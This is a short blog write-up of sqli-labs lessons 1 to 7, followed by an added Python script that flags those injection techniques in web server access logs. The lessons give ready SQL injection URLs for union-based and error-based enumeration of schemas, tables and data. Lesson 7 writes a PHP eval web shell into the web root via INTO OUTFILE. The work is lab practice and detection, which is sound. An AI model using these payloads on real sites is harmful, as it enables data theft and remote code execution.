Dayu

sCRiPt n00b

sqli-labs writeup


Less_1-4

  1. Append a single quote (') to find the injection point: http://127.0.0.1/Less-1/?id=1'
  2. Guess the number of columns: http://127.0.0.1/Less-1/?id=0' order by 4--+
  3. UNION query: http://127.0.0.1/Less-1/?id=0' union select 1,2,3--+
  4. Dump the database names: http://127.0.0.1/Less-1/?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata--+
  5. Dump the table names: http://127.0.0.1/Less-1/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
  6. Dump the column names: http://127.0.0.1/Less-1/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='emails'--+
  7. Dump the data: http://127.0.0.1/Less-1/?id=0' union select 1,2,concat_ws(char(32,58,32),id,email_id) from emails--+

Less_5-6

  1. Dump the table names in security: http://127.0.0.1/Less-5/?id=1' union select count(*), 1, concat(0x7e,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1), 0x7e, floor(rand()*2)) as q from information_schema.tables group by q--+

  2. Dump the column names of emails: http://127.0.0.1/Less-5/?id=1' union select count(*), 1, concat(0x7e, (select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x656D61696C73 limit 0, 1), 0x7e, floor(rand()*2)) as q from information_schema.tables group by q--+

Less_7

  • Write a file: http://127.0.0.1/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST[dayu]);?>' into outfile '/var/www/html/shell.php'--+
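
To recognise the requests from this writeup in a web server access log, the following added example (not part of the original post) classifies each log line by the technique it uses. The log lines are constructed samples, and the rule names and the `classify`/`scan` helpers are this example's own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Keyword gap: whitespace or an inline /* */ comment between SQL keywords.
GAP = r"(?:\s|/\*.*?\*/)+"
# One rule per technique in this writeup (rule names are this example's own).
RULES = {
    "order-by-probe": re.compile(rf"\border{GAP}by{GAP}\d+", re.I),
    "union-select": re.compile(rf"\bunion{GAP}(?:all{GAP})?select\b", re.I),
    "schema-enumeration": re.compile(r"\binformation_schema\b", re.I),
    "error-based-rand-group-by": re.compile(
        rf"floor\s*\(\s*rand\s*\(.*\bgroup{GAP}by\b", re.I | re.S),
    "file-write": re.compile(rf"\binto{GAP}(?:out|dump)file\b", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return sorted names of the rules matched by one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    # Decode twice so double-encoded payloads (%2527) are also normalised.
    decoded = unquote_plus(unquote_plus(query))
    return sorted(name for name, rx in RULES.items() if rx.search(decoded))

def scan(lines):
    """Return (line_index, matched_rules) for every line that hits a rule."""
    return [(i, hits) for i, line in enumerate(lines) if (hits := classify(line))]

# Constructed sample log (combined-log style), shaped like the lab requests.
PFX = '127.0.0.1 - - [01/Jan/2019:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    PFX + '/Less-1/?id=1 HTTP/1.1" 200 721',
    PFX + '/Less-1/?id=0%27%20order%20by%204--+ HTTP/1.1" 200 690',
    PFX + '/Less-1/?id=0%27%20union%20select%201,2,group_concat(table_name)'
          '%20from%20information_schema.tables--+ HTTP/1.1" 200 802',
    PFX + '/Less-5/?id=1%27%20union%20select%20count(*),1,concat(0x7e,'
          'floor(rand()*2))%20as%20q%20from%20information_schema.tables'
          '%20group%20by%20q--+ HTTP/1.1" 200 655',
    PFX + '/Less-7/?id=1%27))%20union%20select%201,2,3%20into%20outfile'
          '%20%27/var/www/html/shell.php%27--+ HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG):
        print(idx, ", ".join(hits))
```

Keyword signatures like these are a triage aid and can be evaded by encoding tricks; the fix for the behaviour these labs exercise is parameterized queries, plus withholding the MySQL FILE privilege and setting secure_file_priv so that INTO OUTFILE cannot write to the web root.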

© 2019 大宇